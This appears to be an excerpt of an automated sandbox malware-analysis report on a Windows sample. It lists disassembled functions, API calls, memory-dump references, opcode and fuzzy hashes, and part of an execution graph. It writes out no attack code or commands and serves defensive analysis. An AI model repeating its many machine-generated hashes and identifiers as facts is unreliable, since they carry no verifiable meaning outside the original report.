                                                                                                                                                                • Opcode Fuzzy Hash: 9252412824798a3b8a0ccc8f1dc9be0398095e24a1ece0dc548d7b3b3f57d186
                                                                                                                                                                • Instruction Fuzzy Hash: 8ED17B75E042489FDB20DFA8C980ADDFBB4FF09354F24452AE426EB742D730AA46CB50
                                                                                                                                                                Function 6C8F423F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                • Opcode ID: e9f3824a28fc3c1b8f96f3b68ae9f0dd03de741f7f1844cd53bfe6766071a840
                                                                                                                                                                • Instruction ID: f80d7d0928fea99174eeb423de2531ab67269cdb96e56565abc6227f86aa1d8c
                                                                                                                                                                • Opcode Fuzzy Hash: e9f3824a28fc3c1b8f96f3b68ae9f0dd03de741f7f1844cd53bfe6766071a840
                                                                                                                                                                • Instruction Fuzzy Hash: 51519E716066069FEB258E54DB40FA977B4FBC4398F200D2ED97547E90E771E842CA90
                                                                                                                                                                Function 6C8FAE81 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8FAEE5
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6C8FAEEC
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6C8FAF26
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6C8FAF2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                • Opcode ID: bbb8d84189e8bad83fdf37b16dbd6adb07674fe5337aa6401fec416ea19ba623
                                                                                                                                                                • Instruction ID: 97523441af07f8140e5ba471b307b9d1d19e7a351f748fc032eb9b2e190332b9
                                                                                                                                                                • Opcode Fuzzy Hash: bbb8d84189e8bad83fdf37b16dbd6adb07674fe5337aa6401fec416ea19ba623
                                                                                                                                                                • Instruction Fuzzy Hash: 3221B671604205AF9B309F6ACA809ABB7B9FF063FC7048D29E834D7A40D735EC528760
                                                                                                                                                                Function 6C8FC319 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6C8FC321
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C8FC359
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C8FC379
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                • Opcode ID: fd20d2af1156bb174ff616877d297739084231c92b94013e262244e69e6c1ee9
                                                                                                                                                                • Instruction ID: 7707ae4656ac44d326673d6eb6ad981437767b266539b2f6e5bf5b01a4ceb274
                                                                                                                                                                • Opcode Fuzzy Hash: fd20d2af1156bb174ff616877d297739084231c92b94013e262244e69e6c1ee9
                                                                                                                                                                • Instruction Fuzzy Hash: B911A9F2605519BEAB3127BB4D88CAF697CEF462DC7140929F921D2601FB748E468171
                                                                                                                                                                Function 6C8DD840 Relevance: 6.1, APIs: 4, Instructions: 61synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8DD873
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6C8DD87F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD896
                                                                                                                                                                • CloseHandle.KERNEL32(6C8E0A90), ref: 6C8DD906
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1454876536-0
                                                                                                                                                                • Opcode ID: 2c3a7e10d82cb6e86b8f77a17dca437b5f48b82a360b9141e8b6848517d90bfd
                                                                                                                                                                • Instruction ID: aefd9d35a257b81c45b6dd864a3bfb21cb26b2f78fd5f31a7df5ee373ebc90cd
                                                                                                                                                                • Opcode Fuzzy Hash: 2c3a7e10d82cb6e86b8f77a17dca437b5f48b82a360b9141e8b6848517d90bfd
                                                                                                                                                                • Instruction Fuzzy Hash: 75214CB2D0020CDBCF10DF94D9457DEBBB8FB05324F100629E814A6690E7356649CFA1
                                                                                                                                                                Function 6C9021E3 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000), ref: 6C9021FA
                                                                                                                                                                • GetLastError.KERNEL32(?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?,?,?,6C8FD599,00000000), ref: 6C902206
                                                                                                                                                                  • Part of subcall function 6C9021CC: CloseHandle.KERNEL32(FFFFFFFE,6C902216,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?,?), ref: 6C9021DC
                                                                                                                                                                • ___initconout.LIBCMT ref: 6C902216
                                                                                                                                                                  • Part of subcall function 6C90218E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9021BD,6C901681,?,?,6C8FCFF6,?,00000000,00000000,?), ref: 6C9021A1
                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C901694,00000000,00000001,00000000,?,?,6C8FCFF6,?,00000000,00000000,?), ref: 6C90222B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                • Opcode ID: cc14cd750900d2f4976c2eacb8f7b734733e72d9eac2a625fdb2d4ab6cba2e72
                                                                                                                                                                • Instruction ID: d2a6be638a85635dc39798ace24c8b1a80661fa15d13c79fcf9f1e02896d363a
                                                                                                                                                                • Opcode Fuzzy Hash: cc14cd750900d2f4976c2eacb8f7b734733e72d9eac2a625fdb2d4ab6cba2e72
                                                                                                                                                                • Instruction Fuzzy Hash: F0F01C36744529BBCF621FD6CC089993F36FB1A3A0F244118FE1996121C732CA61EBD0
                                                                                                                                                                Function 6C8DA360 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • Box<dyn Any><unnamed>, xrefs: 6C8DA432
                                                                                                                                                                • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 6C8DA6D9, 6C8DA713, 6C8DA732
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                                                                                                                                • API String ID: 0-3513654867
                                                                                                                                                                • Opcode ID: 0606440f9f6f86765828dc1c9920b72cf233d6e295affc6177931422dbbc9f3c
                                                                                                                                                                • Instruction ID: 513742cfa21191a23ce9258ef14104936907fa7805f365065e5a90dcf9c82935
                                                                                                                                                                • Opcode Fuzzy Hash: 0606440f9f6f86765828dc1c9920b72cf233d6e295affc6177931422dbbc9f3c
                                                                                                                                                                • Instruction Fuzzy Hash: 55A16971600B00CBE331DF26C680793BBF4AB05308F558D6DD9AA8BA91DB35F409CB91
                                                                                                                                                                Function 6C8F483B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6C8F4860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                • Opcode ID: 91c4f58785dbf23e75e20fc4f9ffdfc68365e082b2213d642f59c2ba064949f0
                                                                                                                                                                • Instruction ID: a34a7368babb5d23fb942b8b401518b7174cb2d9e020bd9e855177f9362c239f
                                                                                                                                                                • Opcode Fuzzy Hash: 91c4f58785dbf23e75e20fc4f9ffdfc68365e082b2213d642f59c2ba064949f0
                                                                                                                                                                • Instruction Fuzzy Hash: 2C417B71A00209EFDF12CF94CA80ADE7BB5BF88348F24456AF924A7620D375E952DB50
                                                                                                                                                                Function 6C905230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6C8DAFD9,?,00000004,000000FF,6C8E0A00,FFFFFFFF,?,?,6C8DAFD9,6C933BF4), ref: 6C9052BB
                                                                                                                                                                • GetLastError.KERNEL32(?,6C8DAFD9,6C933BF4), ref: 6C9052C2
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C905313
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastWait
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                • API String ID: 1574541344-1397593039
                                                                                                                                                                • Opcode ID: cca5dd184547b7630c36a3b81b5b93cbc60aed334fa8ba7b940a1353491eefcf
                                                                                                                                                                • Instruction ID: 3f5348479fbe61eb6ccee678d5ac2548536d6ab02ad1a39c98bfae4883b2ea4f
                                                                                                                                                                • Opcode Fuzzy Hash: cca5dd184547b7630c36a3b81b5b93cbc60aed334fa8ba7b940a1353491eefcf
                                                                                                                                                                • Instruction Fuzzy Hash: D42107317052888BDB148E698454BAD73B5EF4633CF340B2DE97197AE0E731D8828799
                                                                                                                                                                Function 6C8F90F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6C8F913E
                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 6C8F9150
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                • String ID: <V
                                                                                                                                                                • API String ID: 3000768030-365566370
                                                                                                                                                                • Opcode ID: 7765099ce730ed40bfb232747cff9a5b6a7ab4cb7771746017d0631edf735edb
                                                                                                                                                                • Instruction ID: 2e1fa47c6ad230af8619d877d92f47e8f3b6b5f0764e5497d2201caff4e575c9
                                                                                                                                                                • Opcode Fuzzy Hash: 7765099ce730ed40bfb232747cff9a5b6a7ab4cb7771746017d0631edf735edb
                                                                                                                                                                • Instruction Fuzzy Hash: 6B11A5216087514ADB304D3F8E8CA12BBA5A7932B4B340F2DD5BA869E1D738D4D7C541
                                                                                                                                                                Function 6C8EDC40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _fwprintf.LIBCONCRTD ref: 6C8EDCC4
                                                                                                                                                                  • Part of subcall function 6C8EDF70: _fread.LIBCMTD ref: 6C8EDF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fread_fwprintf
                                                                                                                                                                • String ID: $%02x
                                                                                                                                                                • API String ID: 2879884958-2181446322
                                                                                                                                                                • Opcode ID: 50118e58c7abeffabf880782ed54f514b4b0dee722e774ac9a7f61b22a4c87e4
                                                                                                                                                                • Instruction ID: 026343b548f2eb364c8f2181a13bb0b86db5a3d87d5d836ca8f9546278f648ed
                                                                                                                                                                • Opcode Fuzzy Hash: 50118e58c7abeffabf880782ed54f514b4b0dee722e774ac9a7f61b22a4c87e4
                                                                                                                                                                • Instruction Fuzzy Hash: F1119170D04108EBCF24CF98C980B9D7BB0AF85348F1485BAE8059B741D734AB98DB81
                                                                                                                                                                Function 6C8E0160 Relevance: 5.1, APIs: 4, Instructions: 75COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,00000001,00000000,?,?,00000100,6C90EA54,6C90EB80), ref: 6C8E0172
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,6C8DAF6E), ref: 6C8E0198
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,00000100,6C90EA54,6C90EB80), ref: 6C8E01B2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E01FC
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E024C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 96d2c9d6ac49cce3a76bd57d06a64c4b2bec9044e8081c9eda5fa53ea063a4d0
                                                                                                                                                                • Instruction ID: 79c94e9e965b0f7e5d7174c9108a1d0873e13dd8153df28abc2d4ebb631c722a
                                                                                                                                                                • Opcode Fuzzy Hash: 96d2c9d6ac49cce3a76bd57d06a64c4b2bec9044e8081c9eda5fa53ea063a4d0
                                                                                                                                                                • Instruction Fuzzy Hash: A32108B17452809FEB314BA5D904B2637F8FB47719F244C1CE85ACBA91CB70D885D710

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:49.5%
                                                                                                                                                                Signature Coverage:1.1%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:134
                                                                                                                                                                execution_graph 124684 6fe9562b 124685 6fe95638 124684->124685 124697 6fe987eb 124685->124697 124689 6fe9565e 124690 6fe987eb __dosmaperr 14 API calls 124689->124690 124694 6fe95684 124689->124694 124692 6fe95678 124690->124692 124705 6fe98848 14 API calls __dosmaperr 124692->124705 124695 6fe95690 124694->124695 124696 6fe956ee 124694->124696 124706 6fe98b7e 6 API calls __dosmaperr 124694->124706 124702 6fe987f8 __dosmaperr 124697->124702 124698 6fe98823 RtlAllocateHeap 124700 6fe95652 124698->124700 124698->124702 124699 6fe98838 124708 6fe987d8 14 API calls __dosmaperr 124699->124708 124704 6fe98848 14 API calls __dosmaperr 124700->124704 124702->124698 124702->124699 124707 6fe9c504 EnterCriticalSection LeaveCriticalSection __dosmaperr 124702->124707 124704->124689 124705->124694 124706->124694 124707->124702 124708->124700 124709 75244 124732 664b1 124709->124732 124920 6210e 124732->124920 124735 6210e 26 API calls 124736 664d5 124735->124736 124737 6210e 26 API calls 124736->124737 124738 664e0 124737->124738 124739 6210e 26 API calls 124738->124739 124740 664eb 124739->124740 124741 6210e 26 API calls 124740->124741 124742 664f3 124741->124742 124743 6210e 26 API calls 124742->124743 124744 664fe 124743->124744 124745 6210e 26 API calls 124744->124745 124746 66509 124745->124746 124747 6210e 26 API calls 124746->124747 124748 66511 124747->124748 124924 6bf45 124748->124924 124762 66558 125060 7a6ef CreateFileW 124762->125060 124764 66570 124765 7a6ef 31 API calls 124764->124765 124784 66588 124765->124784 124766 6666b 125073 6696f 124766->125073 124767 61e82 27 API calls 124782 66613 124767->124782 124770 7a6ef 31 API calls 124770->124784 124773 7a6ef 31 API calls 124773->124782 124776 61e82 27 API calls 124776->124784 124778 66cbb 27 API calls 124778->124782 124779 62000 26 API calls 124780 66697 124779->124780 124783 62000 26 API calls 124780->124783 124782->124766 124782->124767 124782->124773 124782->124778 124787 62000 26 API calls 124782->124787 124785 6669f 124783->124785 124784->124770 124784->124776 124784->124782 124786 6200a 27 API calls 124784->124786 124790 62000 26 API calls 124784->124790 125068 66cbb 124784->125068 125122 71645 39 API calls 124784->125122 124788 6696f 31 API calls 124785->124788 124786->124784 124787->124782 124789 666ad 124788->124789 124791 66a18 29 API calls 124789->124791 124790->124784 124792 666b7 124791->124792 124793 6200a 27 API calls 124792->124793 124794 666c3 124793->124794 124795 62000 26 API calls 124794->124795 124796 666cb 124795->124796 124797 62000 26 API calls 124796->124797 124798 666d3 124797->124798 124799 6696f 31 API calls 124798->124799 124800 666e1 124799->124800 124801 66a18 29 API calls 124800->124801 124802 666eb 124801->124802 124803 6200a 27 API calls 124802->124803 124804 666f4 124803->124804 124805 62000 26 API calls 124804->124805 124806 666fc 124805->124806 124807 62000 26 API calls 124806->124807 124808 66704 124807->124808 124809 62ff0 27 API calls 124808->124809 124810 66747 124809->124810 124811 62fcc 27 API calls 124810->124811 124812 66755 124811->124812 124813 62fcc 27 API calls 124812->124813 124814 66763 124813->124814 124815 62fcc 27 API calls 124814->124815 124921 62116 124920->124921 125123 62411 124921->125123 124923 62121 124923->124735 124925 6bf5c 124924->124925 125141 642a7 124925->125141 124927 6bf66 125147 68bcd 124927->125147 124929 6bf8a 124930 6bf92 FindFirstFileW 124929->124930 124931 61f29 26 API calls 124930->124931 